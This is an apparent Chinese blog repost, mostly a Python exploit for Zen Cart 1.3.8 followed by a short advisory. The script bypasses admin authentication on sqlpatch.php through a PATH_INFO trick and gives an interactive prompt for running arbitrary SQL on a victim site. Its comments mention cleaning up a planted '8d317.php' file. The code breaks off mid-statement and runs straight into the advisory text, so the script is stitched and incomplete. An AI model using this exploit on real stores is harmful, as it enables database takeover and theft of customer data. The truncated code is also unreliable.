Zen Cart admin/sqlpatch.php模块SQL注入漏洞

#!/usr/bin/python



#

# ------- Zen Cart 1.3.8 Remote SQL Execution

# http://www.zen-cart.com/

# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!

# A new version (1.3.8a) is avaible on http://www.zen-cart.com/

#

# BlackH :)

#



#

# Notes: must have admin/sqlpatch.php enabled

#

# clean the database :

# DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);

# DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';



import urllib, urllib2, re, sys



a,b = sys.argv,0



def option(name, need = 0):

global a, b

for param in sys.argv:

if(param == '-'+name): return str(sys.argv[b+1])

b = b + 1

if(need):

print '/n#error', "-"+name, 'parameter required'

exit(1)



if (len(sys.argv) < 2):

print """

=____________ Zen Cart 1.3.8 Remote SQL Execution Exploit ____________=

========================================================================

| BlackH <Bl4ck.H@gmail.com> |

========================================================================

| |

| $system> python """+sys.argv[0]+""" -url <url> |

| Param: <url> ex: http://victim.com/site (no slash) |

| |

| Note: blind "injection" |

========================================================================

"""

exit(1)



url, trick = option('url', 1), "/password_forgotten.php"



while True:

cmd = raw_input('sql@jah$ ')

if (cmd == "exit"): exit(1)

req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))

if (re.findall('1 statements processed',urllib2.urlopen(req).read())):

print '>> success (', cmd, ")"

else:

影响版本:
Zen Cart 1.3.8

程序介绍:

Zen Cart是一款免费开源的购物车软件。

漏洞分析:

Zen Cart 没有对admin/sqlpatch.php模块强制管理认证,这允许远程攻击者在请求中通过query_string和PATH_INFO参数执行 SQL注入攻击。

 

 

解决方案:
厂商补丁:

Zen Ventures
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.zen-cart.com/forum/showthread.php?t=130161

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值